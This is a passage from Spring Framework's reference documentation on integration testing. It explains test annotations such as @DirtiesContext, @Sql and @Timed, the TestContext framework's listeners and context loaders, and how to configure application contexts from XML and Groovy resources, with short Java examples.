Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\n+\n\nThe following example demonstrates how to declare a properties file from the classpath.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nThe following example demonstrates how to declare _inlined_ properties.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(properties = { \"timezone = GMT\", \"port: 4242\" })\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n* `@DirtiesContext`\n\n+\n\nIndicates that the underlying Spring `ApplicationContext` has been __dirtied__ during\nthe execution of a test (i.e., modified or corrupted in some manner -- for example, by\nchanging the state of a singleton bean) and should be closed. When an application\ncontext is marked __dirty__, it is removed from the testing framework's cache and\nclosed. As a consequence, the underlying Spring container will be rebuilt for any\nsubsequent test that requires a context with the same configuration metadata.\n\n+\n\n`@DirtiesContext` can be used as both a class-level and method-level annotation within\nthe same class or class hierarchy. In such scenarios, the `ApplicationContext` is marked\nas __dirty__ before or after any such annotated method as well as before or after the\ncurrent test class, depending on the configured `methodMode` and `classMode`.\n\n+\n\nThe following examples explain when the context would be dirtied for various\nconfiguration scenarios:\n\n+\n\n** Before the current test class, when declared on a class with class mode set to\n`BEFORE_CLASS`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_CLASS)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n** After the current test class, when declared on a class with class mode set to\n`AFTER_CLASS` (i.e., the default class mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n** Before each test method in the current test class, when declared on a class with class\nmode set to `BEFORE_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_EACH_TEST_METHOD)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n** After each test method in the current test class, when declared on a class with class\nmode set to `AFTER_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = AFTER_EACH_TEST_METHOD)**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n** Before the current test, when declared on a method with the method mode set to\n`BEFORE_METHOD`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(methodMode = BEFORE_METHOD)**\n\t@Test\n\tpublic void testProcessWhichRequiresFreshAppCtx() {\n\t\t\/\/ some logic that requires a new Spring container\n\t}\n----\n\n+\n\n** After the current test, when declared 
on a method with the method mode set to\n`AFTER_METHOD` (i.e., the default method mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\t@Test\n\tpublic void testProcessWhichDirtiesAppCtx() {\n\t\t\/\/ some logic that results in the Spring container being dirtied\n\t}\n----\n\n+\n\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy via `@ContextHierarchy`, the `hierarchyMode` flag can be used to control how\nthe context cache is cleared. By default an __exhaustive__ algorithm will be used that\nclears the context cache including not only the current level but also all other context\nhierarchies that share an ancestor context common to the current test; all\n++ApplicationContext++s that reside in a sub-hierarchy of the common ancestor context\nwill be removed from the context cache and closed. If the __exhaustive__ algorithm is\noverkill for a particular use case, the simpler __current level__ algorithm can be\nspecified instead, as seen below.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class BaseTests {\n\t\t\/\/ class body...\n\t}\n\n\tpublic class ExtendedTests extends BaseTests {\n\n\t\t@Test\n\t\t@DirtiesContext(**hierarchyMode = CURRENT_LEVEL**)\n\t\tpublic void test() {\n\t\t\t\/\/ some logic that results in the child context being dirtied\n\t\t}\n\t}\n----\n\n+\n\nFor further details regarding the `EXHAUSTIVE` and `CURRENT_LEVEL` algorithms see the\n`DirtiesContext.HierarchyMode` javadocs.\n\n* `@TestExecutionListeners`\n\n+\n\nDefines class-level metadata for configuring which ++TestExecutionListener++s should be\nregistered with the `TestContextManager`. Typically, `@TestExecutionListeners` is used\nin conjunction with `@ContextConfiguration`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestExecutionListeners**({CustomTestExecutionListener.class, AnotherTestExecutionListener.class})\n\tpublic class CustomTestExecutionListenerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n`@TestExecutionListeners` supports __inherited__ listeners by default. See the javadocs\nfor an example and further details.\n\n+\n\n* `@Commit`\n\n+\n\nIndicates that the transaction for a transactional test method should be __committed__\nafter the test method has completed. `@Commit` can be used as a direct replacement for\n`@Rollback(false)` in order to more explicitly convey the intent of the code. Analogous to\n`@Rollback`, `@Commit` may also be declared as a class-level or method-level annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Commit**\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n* `@Rollback`\n\n+\n\nIndicates whether the transaction for a transactional test method should be __rolled\nback__ after the test method has completed. If `true`, the transaction is rolled back;\notherwise, the transaction is committed (see also `@Commit`). Rollback semantics for\nintegration tests in the Spring TestContext Framework default to `true` even if\n`@Rollback` is not explicitly declared.\n\n+\n\nWhen declared as a class-level annotation, `@Rollback` defines the default rollback\nsemantics for all test methods within the test class hierarchy. 
When declared as a
method-level annotation, `@Rollback` defines rollback semantics for the specific test
method, potentially overriding class-level `@Rollback` or `@Commit` semantics.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@Rollback**(false)
	@Test
	public void testProcessWithoutRollback() {
		// ...
	}
----

* `@BeforeTransaction`

+

Indicates that the annotated `void` method should be executed __before__ a
transaction is started for test methods configured to run within a transaction via the
`@Transactional` annotation.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@BeforeTransaction**
	void beforeTransaction() {
		// logic to be executed before a transaction is started
	}
----

* `@AfterTransaction`

+

Indicates that the annotated `void` method should be executed __after__ a
transaction has ended for test methods configured to run within a transaction via the
`@Transactional` annotation.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@AfterTransaction**
	void afterTransaction() {
		// logic to be executed after a transaction has ended
	}
----

* `@Sql`

+

Used to annotate a test class or test method to configure SQL scripts to be executed
against a given database during integration tests.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	**@Sql**({"/test-schema.sql", "/test-user-data.sql"})
	public void userTest() {
		// execute code that relies on the test schema and test data
	}
----

+

See <<testcontext-executing-sql-declaratively>> for further details.

* `@SqlConfig`

+

Defines metadata that is used to determine how to parse and execute SQL scripts
configured via the `@Sql` annotation.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(
		scripts = "/test-user-data.sql",
		config = **@SqlConfig**(commentPrefix = "`", separator = "@@")
	)
	public void userTest() {
		// execute code that relies on the test data
	}
----

* `@SqlGroup`

+

A container annotation that aggregates several `@Sql` annotations. Can be used natively,
declaring several nested `@Sql` annotations. Can also be used in conjunction with Java
8's support for repeatable annotations, where `@Sql` can simply be declared several times
on the same class or method, implicitly generating this container annotation.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	**@SqlGroup**({
		@Sql(scripts = "/test-schema.sql", config = @SqlConfig(commentPrefix = "`")),
		@Sql("/test-user-data.sql")
	})
	public void userTest() {
		// execute code that uses the test schema and test data
	}
----


[[integration-testing-annotations-standard]]
==== Standard Annotation Support
The following annotations are supported with standard semantics for all configurations
of the Spring TestContext Framework.
Note that these annotations are not specific to\ntests and can be used anywhere in the Spring Framework.\n\n* `@Autowired`\n* `@Qualifier`\n* `@Resource` (javax.annotation) _if JSR-250 is present_\n* `@Inject` (javax.inject) _if JSR-330 is present_\n* `@Named` (javax.inject) _if JSR-330 is present_\n* `@PersistenceContext` (javax.persistence) _if JPA is present_\n* `@PersistenceUnit` (javax.persistence) _if JPA is present_\n* `@Required`\n* `@Transactional`\n\n.JSR-250 Lifecycle Annotations\n[NOTE]\n====\nIn the Spring TestContext Framework `@PostConstruct` and `@PreDestroy` may be used with\nstandard semantics on any application components configured in the `ApplicationContext`;\nhowever, these lifecycle annotations have limited usage within an actual test class.\n\nIf a method within a test class is annotated with `@PostConstruct`, that method will be\nexecuted before any __before__ methods of the underlying test framework (e.g., methods\nannotated with JUnit's `@Before`), and that will apply for every test method in the test\nclass. On the other hand, if a method within a test class is annotated with\n`@PreDestroy`, that method will __never__ be executed. Within a test class it is\ntherefore recommended to use test lifecycle callbacks from the underlying test framework\ninstead of `@PostConstruct` and `@PreDestroy`.\n====\n\n\n[[integration-testing-annotations-junit]]\n==== Spring JUnit Testing Annotations\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit4-runner,SpringRunner>>, <<testcontext-junit4-rules,Spring's JUnit\nrules>>, or <<testcontext-support-classes-junit4,Spring's JUnit support classes>>.\n\n* `@IfProfileValue`\n\n+\n\nIndicates that the annotated test is enabled for a specific testing environment. If the\nconfigured `ProfileValueSource` returns a matching `value` for the provided `name`, the\ntest is enabled. Otherwise, the test will be disabled and effectively _ignored_.\n\n+\n\n`@IfProfileValue` can be applied at the class level, the method level, or both.\nClass-level usage of `@IfProfileValue` takes precedence over method-level usage for any\nmethods within that class or its subclasses. Specifically, a test is enabled if it is\nenabled both at the class level _and_ at the method level; the absence of\n`@IfProfileValue` means the test is implicitly enabled. 
This is analogous to the
semantics of JUnit's `@Ignore` annotation, except that the presence of `@Ignore` always
disables a test.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@IfProfileValue**(**name**="java.vendor", **value**="Oracle Corporation")
	@Test
	public void testProcessWhichRunsOnlyOnOracleJvm() {
		// some logic that should run only on Java VMs from Oracle Corporation
	}
----

+

Alternatively, you can configure `@IfProfileValue` with a list of `values` (with __OR__
semantics) to achieve TestNG-like support for __test groups__ in a JUnit environment.
Consider the following example:

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@IfProfileValue**(**name**="test-groups", **values**={"unit-tests", "integration-tests"})
	@Test
	public void testProcessWhichRunsForUnitOrIntegrationTestGroups() {
		// some logic that should run only for unit and integration test groups
	}
----

* `@ProfileValueSourceConfiguration`

+

Class-level annotation that specifies what type of `ProfileValueSource` to use when
retrieving __profile values__ configured through the `@IfProfileValue` annotation. If
`@ProfileValueSourceConfiguration` is not declared for a test,
`SystemProfileValueSource` is used by default.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@ProfileValueSourceConfiguration**(CustomProfileValueSource.class)
	public class CustomProfileValueSourceTests {
		// class body...
	}
----

* `@Timed`

+

Indicates that the annotated test method must finish execution in a specified time
period (in milliseconds). If the test execution time exceeds the specified time period,
the test fails.

+

The time period includes execution of the test method itself, any repetitions of the
test (see `@Repeat`), as well as any __set up__ or __tear down__ of the test fixture.

+

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	**@Timed**(millis=1000)
	public void testProcessWithOneSecondTimeout() {
		// some logic that should not take longer than 1 second to execute
	}
----

+

Spring's `@Timed` annotation has different semantics than JUnit's `@Test(timeout=...)`
support. Specifically, due to the manner in which JUnit handles test execution timeouts
(that is, by executing the test method in a separate `Thread`), `@Test(timeout=...)`
preemptively fails the test if the test takes too long. Spring's `@Timed`, on the other
hand, does not preemptively fail the test but rather waits for the test to complete
before failing.

* `@Repeat`

+

Indicates that the annotated test method must be executed repeatedly.
The number of\ntimes that the test method is to be executed is specified in the annotation.\n\n+\n\nThe scope of execution to be repeated includes execution of the test method itself as\nwell as any __set up__ or __tear down__ of the test fixture.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Repeat**(10)\n\t@Test\n\tpublic void testProcessRepeatedly() {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[integration-testing-annotations-meta]]\n==== Meta-Annotation Support for Testing\nAs of Spring Framework 4.0, it is possible to use test-related annotations as\n<<beans-meta-annotations,meta-annotations>> in order to create custom _composed annotations_\nand reduce configuration duplication across a test suite.\n\nEach of the following may be used as meta-annotations in conjunction with the\n<<testcontext-framework,TestContext framework>>.\n\n* `@ContextConfiguration`\n* `@ContextHierarchy`\n* `@ActiveProfiles`\n* `@TestPropertySource`\n* `@DirtiesContext`\n* `@WebAppConfiguration`\n* `@TestExecutionListeners`\n* `@Transactional`\n* `@BeforeTransaction`\n* `@AfterTransaction`\n* `@Commit`\n* `@Rollback`\n* `@Sql`\n* `@SqlConfig`\n* `@SqlGroup`\n* `@Repeat`\n* `@Timed`\n* `@IfProfileValue`\n* `@ProfileValueSourceConfiguration`\n\nFor example, if we discover that we are repeating the following configuration\nacross our JUnit-based test suite...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class UserRepositoryTests { }\n----\n\nWe can reduce the above duplication by introducing a custom _composed annotation_\nthat centralizes the common test configuration like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic @interface TransactionalDevTest { }\n----\n\nThen we can use our custom `@TransactionalDevTest` annotation to simplify the\nconfiguration of individual test classes as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTest\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTest\n\tpublic class UserRepositoryTests { }\n----\n\nFor further details, consult the <<annotation-programming-model,Spring Annotation Programming Model>>.\n\n\n[[testcontext-framework]]\n=== Spring TestContext Framework\nThe __Spring TestContext Framework__ (located in the\n`org.springframework.test.context` package) provides generic, annotation-driven unit and\nintegration testing support that is agnostic of the testing framework in use. The\nTestContext framework also places a great deal of importance on __convention over\nconfiguration__ with reasonable defaults that can be overridden through annotation-based\nconfiguration.\n\nIn addition to generic testing infrastructure, the TestContext framework provides\nexplicit support for JUnit and TestNG in the form of `abstract` support classes. 
For\nJUnit, Spring also provides a custom JUnit `Runner` and custom JUnit `Rules` that allow\none to write so-called __POJO test classes__. POJO test classes are not required to\nextend a particular class hierarchy.\n\nThe following section provides an overview of the internals of the TestContext\nframework. If you are only interested in using the framework and not necessarily\ninterested in extending it with your own custom listeners or custom loaders, feel free\nto go directly to the configuration (<<testcontext-ctx-management,context management>>,\n<<testcontext-fixture-di,dependency injection>>, <<testcontext-tx,transaction\nmanagement>>), <<testcontext-support-classes,support classes>>, and\n<<integration-testing-annotations,annotation support>> sections.\n\n\n[[testcontext-key-abstractions]]\n==== Key abstractions\nThe core of the framework consists of the `TestContext` and `TestContextManager` classes\nand the `TestExecutionListener`, `ContextLoader`, and `SmartContextLoader` interfaces. A\n`TestContextManager` is created on a per-test basis (e.g., for the execution of a single\ntest method in JUnit). The `TestContextManager` in turn manages a `TestContext` that\nholds the context of the current test. The `TestContextManager` also updates the state\nof the `TestContext` as the test progresses and delegates to ++TestExecutionListener++s,\nwhich instrument the actual test execution by providing dependency injection, managing\ntransactions, and so on. A `ContextLoader` (or `SmartContextLoader`) is responsible for\nloading an `ApplicationContext` for a given test class. Consult the javadocs and the\nSpring test suite for further information and examples of various implementations.\n\n* `TestContext`: Encapsulates the context in which a test is executed, agnostic of the\n actual testing framework in use, and provides context management and caching support\n for the test instance for which it is responsible. The `TestContext` also delegates to\n a `ContextLoader` (or `SmartContextLoader`) to load an `ApplicationContext` if\n requested.\n* `TestContextManager`: The main entry point into the __Spring TestContext Framework__,\n which manages a single `TestContext` and signals events to all registered\n ++TestExecutionListener++s at well-defined test execution points:\n** prior to any __before class methods__ of a particular testing framework\n** test instance preparation\n** prior to any __before methods__ of a particular testing framework\n** after any __after methods__ of a particular testing framework\n** after any __after class methods__ of a particular testing framework\n* `TestExecutionListener`: Defines a __listener__ API for reacting to test execution\n events published by the `TestContextManager` with which the listener is registered. See\n <<testcontext-tel-config>>.\n* `ContextLoader`: Strategy interface introduced in Spring 2.5 for loading an\n `ApplicationContext` for an integration test managed by the Spring TestContext\n Framework.\n\n+\n\nImplement `SmartContextLoader` instead of this interface in order to provide support for\nannotated classes, active bean definition profiles, test property sources, context\nhierarchies, and ++WebApplicationContext++s.\n\n* `SmartContextLoader`: Extension of the `ContextLoader` interface introduced in Spring\n 3.1.\n\n+\n\nThe `SmartContextLoader` SPI supersedes the `ContextLoader` SPI that was introduced in\nSpring 2.5. 
Specifically, a `SmartContextLoader` can choose to process resource\n`locations`, annotated `classes`, or context `initializers`. Furthermore, a\n`SmartContextLoader` can set active bean definition profiles and test property sources in\nthe context that it loads.\n\n+\n\nSpring provides the following implementations:\n\n+\n\n** `DelegatingSmartContextLoader`: one of two default loaders which delegates internally\nto an `AnnotationConfigContextLoader`, a `GenericXmlContextLoader`, or a\n`GenericGroovyXmlContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes.\nGroovy support is only enabled if Groovy is on the classpath.\n** `WebDelegatingSmartContextLoader`: one of two default loaders which delegates\ninternally to an `AnnotationConfigWebContextLoader`, a `GenericXmlWebContextLoader`, or a\n`GenericGroovyXmlWebContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes. A\nweb `ContextLoader` will only be used if `@WebAppConfiguration` is present on the test\nclass. Groovy support is only enabled if Groovy is on the classpath.\n** `AnnotationConfigContextLoader`: loads a standard `ApplicationContext` from\n__annotated classes__.\n** `AnnotationConfigWebContextLoader`: loads a `WebApplicationContext` from __annotated\nclasses__.\n** `GenericGroovyXmlContextLoader`: loads a standard `ApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n** `GenericGroovyXmlWebContextLoader`: loads a `WebApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n** `GenericXmlContextLoader`: loads a standard `ApplicationContext` from XML __resource\nlocations__.\n** `GenericXmlWebContextLoader`: loads a `WebApplicationContext` from XML __resource\nlocations__.\n** `GenericPropertiesContextLoader`: loads a standard `ApplicationContext` from Java\nProperties files.\n\nThe following sections explain how to configure the TestContext framework through\nannotations and provide working examples of how to write unit and integration tests with\nthe framework.\n\n[[testcontext-tel-config]]\n==== TestExecutionListener configuration\n\nSpring provides the following `TestExecutionListener` implementations that are registered\nby default, exactly in this order.\n\n* `ServletTestExecutionListener`: configures Servlet API mocks for a\n `WebApplicationContext`\n* `DirtiesContextBeforeModesTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _before_ modes\n* `DependencyInjectionTestExecutionListener`: provides dependency injection for the test\n instance\n* `DirtiesContextTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _after_ modes\n* `TransactionalTestExecutionListener`: provides transactional test execution with\n default rollback semantics\n* `SqlScriptsTestExecutionListener`: executes SQL scripts configured via the `@Sql`\n annotation\n\n[[testcontext-tel-config-registering-tels]]\n===== Registering custom TestExecutionListeners\n\nCustom ++TestExecutionListener++s can be registered for a test class and its subclasses\nvia the `@TestExecutionListeners` annotation. 
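For example, a listener that resets the state of an application bean before each test
might be sketched as follows (the `InMemoryStore` bean and its `clear()` method are
hypothetical):

[source,java,indent=0]
----
	import org.springframework.test.context.ContextConfiguration;
	import org.springframework.test.context.TestContext;
	import org.springframework.test.context.TestExecutionListeners;
	import org.springframework.test.context.support.AbstractTestExecutionListener;

	public class ResetStoreTestExecutionListener extends AbstractTestExecutionListener {

		@Override
		public void beforeTestMethod(TestContext testContext) {
			// look up a bean in the test's ApplicationContext and reset its state
			testContext.getApplicationContext().getBean(InMemoryStore.class).clear();
		}
	}

	// registered on a test class (typically in its own file)
	@ContextConfiguration
	@TestExecutionListeners(ResetStoreTestExecutionListener.class)
	public class ResetStoreTests {
		// class body...
	}
----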
See\n<<integration-testing-annotations,annotation support>> and the javadocs for\n`@TestExecutionListeners` for details and examples.\n\n[[testcontext-tel-config-automatic-discovery]]\n===== Automatic discovery of default TestExecutionListeners\n\nRegistering custom ++TestExecutionListener++s via `@TestExecutionListeners` is suitable\nfor custom listeners that are used in limited testing scenarios; however, it can become\ncumbersome if a custom listener needs to be used across a test suite. To address this\nissue, Spring Framework 4.1 supports automatic discovery of _default_\n`TestExecutionListener` implementations via the `SpringFactoriesLoader` mechanism.\n\nSpecifically, the `spring-test` module declares all core default\n++TestExecutionListener++s under the\n`org.springframework.test.context.TestExecutionListener` key in its\n`META-INF\/spring.factories` properties file. Third-party frameworks and developers can\ncontribute their own ++TestExecutionListener++s to the list of default listeners in the\nsame manner via their own `META-INF\/spring.factories` properties file.\n\n[[testcontext-tel-config-ordering]]\n===== Ordering TestExecutionListeners\n\nWhen the TestContext framework discovers default ++TestExecutionListener++s via the\naforementioned `SpringFactoriesLoader` mechanism, the instantiated listeners are sorted\nusing Spring's `AnnotationAwareOrderComparator` which honors Spring's `Ordered` interface\nand `@Order` annotation for ordering. `AbstractTestExecutionListener` and all default\n++TestExecutionListener++s provided by Spring implement `Ordered` with appropriate\nvalues. Third-party frameworks and developers should therefore make sure that their\n_default_ ++TestExecutionListener++s are registered in the proper order by implementing\n`Ordered` or declaring `@Order`. Consult the javadocs for the `getOrder()` methods of the\ncore default ++TestExecutionListener++s for details on what values are assigned to each\ncore listener.\n\n[[testcontext-tel-config-merging]]\n===== Merging TestExecutionListeners\n\nIf a custom `TestExecutionListener` is registered via `@TestExecutionListeners`, the\n_default_ listeners will not be registered. In most common testing scenarios, this\neffectively forces the developer to manually declare all default listeners in addition to\nany custom listeners. The following listing demonstrates this style of configuration.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners({\n\t\tMyCustomTestExecutionListener.class,\n\t\tServletTestExecutionListener.class,\n\t\tDirtiesContextBeforeModesTestExecutionListener.class,\n\t\tDependencyInjectionTestExecutionListener.class,\n\t\tDirtiesContextTestExecutionListener.class,\n\t\tTransactionalTestExecutionListener.class,\n\t\tSqlScriptsTestExecutionListener.class\n\t})\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nThe challenge with this approach is that it requires that the developer know exactly\nwhich listeners are registered by default. Moreover, the set of default listeners can\nchange from release to release -- for example, `SqlScriptsTestExecutionListener` was\nintroduced in Spring Framework 4.1. 
Furthermore, third-party frameworks like Spring\nSecurity register their own default ++TestExecutionListener++s via the aforementioned\n<<testcontext-tel-config-automatic-discovery, automatic discovery mechanism>>.\n\nTo avoid having to be aware of and re-declare **all** _default_ listeners, the\n`mergeMode` attribute of `@TestExecutionListeners` can be set to\n`MergeMode.MERGE_WITH_DEFAULTS`. `MERGE_WITH_DEFAULTS` indicates that locally declared\nlisteners should be merged with the default listeners. The merging algorithm ensures that\nduplicates are removed from the list and that the resulting set of merged listeners is\nsorted according to the semantics of `AnnotationAwareOrderComparator` as described in\n<<testcontext-tel-config-ordering>>. If a listener implements `Ordered` or is annotated\nwith `@Order` it can influence the position in which it is merged with the defaults;\notherwise, locally declared listeners will simply be appended to the list of default\nlisteners when merged.\n\nFor example, if the `MyCustomTestExecutionListener` class in the previous example\nconfigures its `order` value (for example, `500`) to be less than the order of the\n`ServletTestExecutionListener` (which happens to be `1000`), the\n`MyCustomTestExecutionListener` can then be automatically merged with the list of\ndefaults _in front of_ the `ServletTestExecutionListener`, and the previous example could\nbe replaced with the following.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners(\n\t\tlisteners = MyCustomTestExecutionListener.class,\n\t\tmergeMode = MERGE_WITH_DEFAULTS\n\t)\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n\n[[testcontext-ctx-management]]\n==== Context management\n\nEach `TestContext` provides context management and caching support for the test instance\nit is responsible for. Test instances do not automatically receive access to the\nconfigured `ApplicationContext`. However, if a test class implements the\n`ApplicationContextAware` interface, a reference to the `ApplicationContext` is supplied\nto the test instance. Note that `AbstractJUnit4SpringContextTests` and\n`AbstractTestNGSpringContextTests` implement `ApplicationContextAware` and therefore\nprovide access to the `ApplicationContext` automatically.\n\n.@Autowired ApplicationContext\n[TIP]\n====\nAs an alternative to implementing the `ApplicationContextAware` interface, you can\ninject the application context for your test class through the `@Autowired` annotation\non either a field or setter method. 
For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\tpublic class MyTest {\n\n\t\t**@Autowired**\n\t\tprivate ApplicationContext applicationContext;\n\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, if your test is configured to load a `WebApplicationContext`, you can inject\nthe web application context into your test as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@WebAppConfiguration**\n\t@ContextConfiguration\n\tpublic class MyWebAppTest {\n\t\t**@Autowired**\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ class body...\n\t}\n----\n\nDependency injection via `@Autowired` is provided by the\n`DependencyInjectionTestExecutionListener` which is configured by default (see\n<<testcontext-fixture-di>>).\n====\n\nTest classes that use the TestContext framework do not need to extend any particular\nclass or implement a specific interface to configure their application context. Instead,\nconfiguration is achieved simply by declaring the `@ContextConfiguration` annotation at\nthe class level. If your test class does not explicitly declare application context\nresource `locations` or annotated `classes`, the configured `ContextLoader` determines\nhow to load a context from a default location or default configuration classes. In\naddition to context resource `locations` and annotated `classes`, an application context\ncan also be configured via application context `initializers`.\n\nThe following sections explain how to configure an `ApplicationContext` via XML\nconfiguration files, Groovy scripts, annotated classes (typically `@Configuration`\nclasses), or context initializers using Spring's `@ContextConfiguration` annotation.\nAlternatively, you can implement and configure your own custom `SmartContextLoader` for\nadvanced use cases.\n\n[[testcontext-ctx-management-xml]]\n===== Context configuration with XML resources\n\nTo load an `ApplicationContext` for your tests using XML configuration files, annotate\nyour test class with `@ContextConfiguration` and configure the `locations` attribute with\nan array that contains the resource locations of XML configuration metadata. A plain or\nrelative path -- for example `\"context.xml\"` -- will be treated as a classpath resource\nthat is relative to the package in which the test class is defined. A path starting with\na slash is treated as an absolute classpath location, for example\n`\"\/org\/example\/config.xml\"`. A path which represents a resource URL (i.e., a path\nprefixed with `classpath:`, `file:`, `http:`, etc.) will be used __as is__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/app-config.xml\" and\n\t\/\/ \"\/test-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(locations={\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` supports an alias for the `locations` attribute through the\nstandard Java `value` attribute. 
Thus, if you do not need to declare additional\nattributes in `@ContextConfiguration`, you can omit the declaration of the `locations`\nattribute name and declare the resource locations by using the shorthand format\ndemonstrated in the following example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@ContextConfiguration({\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default XML resource\nlocation. Specifically, `GenericXmlContextLoader` and `GenericXmlWebContextLoader` detect\na default location based on the name of the test class. If your class is named\n`com.example.MyTest`, `GenericXmlContextLoader` loads your application context from\n`\"classpath:com\/example\/MyTest-context.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTest-context.xml\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-groovy]]\n===== Context configuration with Groovy scripts\n\nTo load an `ApplicationContext` for your tests using Groovy scripts that utilize the\n<<groovy-bean-definition-dsl,Groovy Bean Definition DSL>>, annotate your test class with\n`@ContextConfiguration` and configure the `locations` or `value` attribute with an array\nthat contains the resource locations of Groovy scripts. Resource lookup semantics for\nGroovy scripts are the same as those described for <<testcontext-ctx-management-xml,XML\nconfiguration files>>.\n\n\n.Enabling Groovy script support\n[TIP]\n====\nSupport for using Groovy scripts to load an `ApplicationContext` in the Spring\nTestContext Framework is enabled automatically 